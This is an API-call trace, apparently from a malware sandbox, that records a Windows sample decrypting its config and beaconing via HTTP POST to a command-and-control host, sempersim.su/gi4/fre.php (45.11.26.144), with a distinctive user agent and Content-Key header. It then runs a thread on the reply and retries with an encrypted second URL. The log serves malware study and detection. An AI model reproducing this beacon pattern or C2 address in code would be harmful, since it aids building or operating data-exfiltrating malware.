GetProcessHeap () returned 0x5b0000 [0138.254] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8590 | out: hHeap=0x5b0000) returned 1 [0138.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.262] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d31e8, pdwDataLen=0xdfcfc | out: pbData=0x5d31e8, pdwDataLen=0xdfcfc) returned 1 [0138.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.263] CryptDestroyKey (hKey=0x5bde08) returned 1 [0138.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0138.264] CryptReleaseContext (hProv=0x5ccad8, dwFlags=0x0) returned 1 [0138.264] GetProcessHeap () returned 0x5b0000 [0138.264] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0138.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0138.265] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0138.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0138.266] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0138.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0138.267] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0138.267] GetProcessHeap () returned 0x5b0000 [0138.267] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0138.267] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5cafc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0138.272] GetProcessHeap () returned 0x5b0000 [0138.272] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa60 [0138.272] socket (af=2, type=1, protocol=6) returned 0x240 [0138.272] connect (s=0x240, name=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0138.357] FreeAddrInfoW (pAddrInfo=0x5cafc0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf338*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0138.357] GetProcessHeap () returned 0x5b0000 [0138.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5ccad8 [0138.357] GetProcessHeap () returned 0x5b0000 [0138.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0138.358] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0138.359] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0138.359] GetProcessHeap () returned 0x5b0000 [0138.359] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5d20e0 [0138.359] GetProcessHeap () returned 0x5b0000 [0138.360] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0138.360] GetProcessHeap () returned 0x5b0000 [0138.360] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d2ff0 [0138.360] GetProcessHeap () returned 0x5b0000 [0138.360] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0138.361] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0138.361] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0138.361] GetProcessHeap () returned 0x5b0000 [0138.362] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5d2198 [0138.362] GetProcessHeap () returned 0x5b0000 [0138.362] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0138.362] send (s=0x240, buf=0x5d2198*, len=236, flags=0) returned 236 [0138.366] send (s=0x240, buf=0x5d1e18*, len=159, flags=0) returned 159 [0138.366] GetProcessHeap () returned 0x5b0000 [0138.366] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5ccd70 [0138.366] recv (in: s=0x240, buf=0x5ccd70, len=4048, flags=0 | out: buf=0x5ccd70*) returned 237 [0140.273] GetProcessHeap () returned 0x5b0000 [0140.274] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2198 | out: hHeap=0x5b0000) returned 1 [0140.274] GetProcessHeap () returned 0x5b0000 [0140.275] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d2ff0 | out: hHeap=0x5b0000) returned 1 [0140.275] GetProcessHeap () returned 0x5b0000 [0140.275] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d20e0 | out: hHeap=0x5b0000) returned 1 [0140.275] GetProcessHeap () returned 0x5b0000 [0140.276] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ccad8 | out: hHeap=0x5b0000) returned 1 [0140.276] closesocket (s=0x240) returned 0 [0140.280] GetProcessHeap () returned 0x5b0000 [0140.280] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa60 | out: hHeap=0x5b0000) returned 1 [0140.280] GetProcessHeap () returned 0x5b0000 [0140.281] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0140.281] GetProcessHeap () returned 0x5b0000 [0140.281] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d31e8 | out: hHeap=0x5b0000) returned 1 [0140.281] GetProcessHeap () returned 0x5b0000 [0140.281] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0140.299] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5ccd70, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0xd68) returned 0x240 [0140.302] Sleep (dwMilliseconds=0xea60) [0150.311] GetProcessHeap () returned 0x5b0000 [0150.311] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3110 [0150.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.317] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0150.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.332] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5cc738) returned 1 [0150.345] GetProcessHeap () returned 0x5b0000 [0150.345] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8800 [0150.345] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.346] CryptImportKey (in: hProv=0x5cc738, pbData=0x5c8800, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0150.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.347] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0150.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.348] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0150.348] GetProcessHeap () returned 0x5b0000 [0150.348] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8800 | out: hHeap=0x5b0000) returned 1 [0150.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.349] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3110, pdwDataLen=0xdfcfc | out: pbData=0x5d3110, pdwDataLen=0xdfcfc) returned 1 [0150.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.356] CryptDestroyKey (hKey=0x5bde08) returned 1 [0150.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.357] CryptReleaseContext (hProv=0x5cc738, dwFlags=0x0) returned 1 [0150.357] GetProcessHeap () returned 0x5b0000 [0150.357] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5f88 [0150.357] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0150.358] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0150.358] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0150.359] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0150.359] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0150.360] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0150.360] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0150.361] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0150.361] GetProcessHeap () returned 0x5b0000 [0150.361] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0150.386] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0150.387] GetProcessHeap () returned 0x5b0000 [0150.388] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0150.388] GetProcessHeap () returned 0x5b0000 [0150.388] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5f88 | out: hHeap=0x5b0000) returned 1 [0150.388] GetProcessHeap () returned 0x5b0000 [0150.388] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3110 | out: hHeap=0x5b0000) returned 1 [0150.388] GetProcessHeap () returned 0x5b0000 [0150.388] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d33e0 [0150.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.389] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0150.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.396] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5cc738) returned 1 [0150.404] GetProcessHeap () returned 0x5b0000 [0150.404] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0150.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.406] CryptImportKey (in: hProv=0x5cc738, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0150.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.407] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0150.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.408] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0150.408] GetProcessHeap () returned 0x5b0000 [0150.408] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0150.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.409] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d33e0, pdwDataLen=0xdfcfc | out: pbData=0x5d33e0, pdwDataLen=0xdfcfc) returned 1 [0150.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.410] CryptDestroyKey (hKey=0x5bde08) returned 1 [0150.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0150.411] CryptReleaseContext (hProv=0x5cc738, dwFlags=0x0) returned 1 [0150.411] GetProcessHeap () returned 0x5b0000 [0150.411] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d5d60 [0150.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0150.415] StrStrA (lpFirst="http://sempersim.su/gi4/fre.php", lpSrch="http://") returned="http://sempersim.su/gi4/fre.php" [0150.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0150.416] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch="/") returned="/gi4/fre.php" [0150.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0150.417] StrStrA (lpFirst="sempersim.su/gi4/fre.php", lpSrch=":") returned 0x0 [0150.417] GetProcessHeap () returned 0x5b0000 [0150.417] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0150.417] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x5c5fb0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) returned 0 [0150.421] GetProcessHeap () returned 0x5b0000 [0150.421] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca950 [0150.421] socket (af=2, type=1, protocol=6) returned 0x294 [0150.422] connect (s=0x294, name=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), namelen=16) returned 0 [0150.495] FreeAddrInfoW (pAddrInfo=0x5c5fb0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x5cf2d8*(sa_family=2, sin_port=0x50, sin_addr="45.11.26.144"), ai_next=0x0)) [0150.495] GetProcessHeap () returned 0x5b0000 [0150.495] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x7d) returned 0x5c5fe0 [0150.495] GetProcessHeap () returned 0x5b0000 [0150.495] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x201b) returned 0x5d6e28 [0150.496] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0150.497] wvsprintfA (in: param_1=0x5d6e28, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0150.497] GetProcessHeap () returned 0x5b0000 [0150.497] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xad) returned 0x5c6068 [0150.497] GetProcessHeap () returned 0x5b0000 [0150.498] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0150.498] GetProcessHeap () returned 0x5b0000 [0150.498] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e) returned 0x5d3500 [0150.498] GetProcessHeap () returned 0x5b0000 [0150.498] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x1fdc) returned 0x5d6e28 [0150.499] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0150.500] wvsprintfA (in: param_1=0x5d6e28, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0xdfce0 | out: param_1="POST /gi4/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: AA29FF80\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0150.500] GetProcessHeap () returned 0x5b0000 [0150.500] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5c6120 [0150.500] GetProcessHeap () returned 0x5b0000 [0150.500] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 [0150.500] send (s=0x294, buf=0x5c6120*, len=236, flags=0) returned 236 [0150.501] send (s=0x294, buf=0x5d1e18*, len=159, flags=0) returned 159 [0150.501] GetProcessHeap () returned 0x5b0000 [0150.501] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xfd0) returned 0x5cd170 [0150.501] recv (in: s=0x294, buf=0x5cd170, len=4048, flags=0 | out: buf=0x5cd170*) returned 237 [0152.368] GetProcessHeap () returned 0x5b0000 [0152.369] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6120 | out: hHeap=0x5b0000) returned 1 [0152.369] GetProcessHeap () returned 0x5b0000 [0152.370] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d3500 | out: hHeap=0x5b0000) returned 1 [0152.370] GetProcessHeap () returned 0x5b0000 [0152.371] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6068 | out: hHeap=0x5b0000) returned 1 [0152.371] GetProcessHeap () returned 0x5b0000 [0152.372] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c5fe0 | out: hHeap=0x5b0000) returned 1 [0152.372] closesocket (s=0x294) returned 0 [0152.374] GetProcessHeap () returned 0x5b0000 [0152.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca950 | out: hHeap=0x5b0000) returned 1 [0152.374] GetProcessHeap () returned 0x5b0000 [0152.374] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d5d60 | out: hHeap=0x5b0000) returned 1 [0152.374] GetProcessHeap () returned 0x5b0000 [0152.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d33e0 | out: hHeap=0x5b0000) returned 1 [0152.375] GetProcessHeap () returned 0x5b0000 [0152.375] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0152.375] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x5cd170, dwCreationFlags=0x0, lpThreadId=0xdff08 | out: lpThreadId=0xdff08*=0x18c) returned 0x294 [0152.377] Sleep (dwMilliseconds=0xea60) [0152.384] GetProcessHeap () returned 0x5b0000 [0152.384] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d32c0 [0152.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.389] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0152.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.407] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5ccad8) returned 1 [0152.415] GetProcessHeap () returned 0x5b0000 [0152.415] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c84a0 [0152.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.419] CryptImportKey (in: hProv=0x5ccad8, pbData=0x5c84a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5be048) returned 1 [0152.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.421] CryptSetKeyParam (hKey=0x5be048, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0152.421] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.422] CryptSetKeyParam (hKey=0x5be048, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0152.422] GetProcessHeap () returned 0x5b0000 [0152.422] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c84a0 | out: hHeap=0x5b0000) returned 1 [0152.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.424] CryptDecrypt (in: hKey=0x5be048, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d32c0, pdwDataLen=0xdfcfc | out: pbData=0x5d32c0, pdwDataLen=0xdfcfc) returned 1 [0152.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.425] CryptDestroyKey (hKey=0x5be048) returned 1 [0152.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.426] CryptReleaseContext (hProv=0x5ccad8, dwFlags=0x0) returned 1 [0152.426] GetProcessHeap () returned 0x5b0000 [0152.426] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d63d8 [0152.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0152.428] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0152.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0152.429] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0152.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0152.430] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0152.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0152.451] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0152.451] GetProcessHeap () returned 0x5b0000 [0152.451] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x20) returned 0x5cb0d8 [0152.451] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x96ËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0xdfcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xdfcd8 | out: ppResult=0xdfcd8*=0x0) returned 11001 [0152.452] GetProcessHeap () returned 0x5b0000 [0152.452] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb0d8 | out: hHeap=0x5b0000) returned 1 [0152.452] GetProcessHeap () returned 0x5b0000 [0152.452] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d63d8 | out: hHeap=0x5b0000) returned 1 [0152.452] GetProcessHeap () returned 0x5b0000 [0152.453] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d32c0 | out: hHeap=0x5b0000) returned 1 [0152.453] GetProcessHeap () returned 0x5b0000 [0152.453] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x40) returned 0x5d3668 [0152.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.454] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0xdfca8*=0x0) returned 1 [0152.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.471] CryptAcquireContextW (in: phProv=0xdfca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0xdfca8*=0x5ccad8) returned 1 [0152.483] GetProcessHeap () returned 0x5b0000 [0152.483] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x24) returned 0x5c8560 [0152.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.485] CryptImportKey (in: hProv=0x5ccad8, pbData=0x5c8560, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0xdfcac | out: phKey=0xdfcac*=0x5bde08) returned 1 [0152.486] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.486] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x4, pbData=0xdfca4*=0x1, dwFlags=0x0) returned 1 [0152.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.487] CryptSetKeyParam (hKey=0x5bde08, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0152.488] GetProcessHeap () returned 0x5b0000 [0152.488] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c8560 | out: hHeap=0x5b0000) returned 1 [0152.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.489] CryptDecrypt (in: hKey=0x5bde08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5d3668, pdwDataLen=0xdfcfc | out: pbData=0x5d3668, pdwDataLen=0xdfcfc) returned 1 [0152.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.490] CryptDestroyKey (hKey=0x5bde08) returned 1 [0152.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0152.492] CryptReleaseContext (hProv=0x5ccad8, dwFlags=0x0) returned 1 [0152.492] GetProcessHeap () returned 0x5b0000 [0152.492] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x212) returned 0x5d4e48 [0152.497] LoadLibraryW (lpLibFileName="shlwapi") 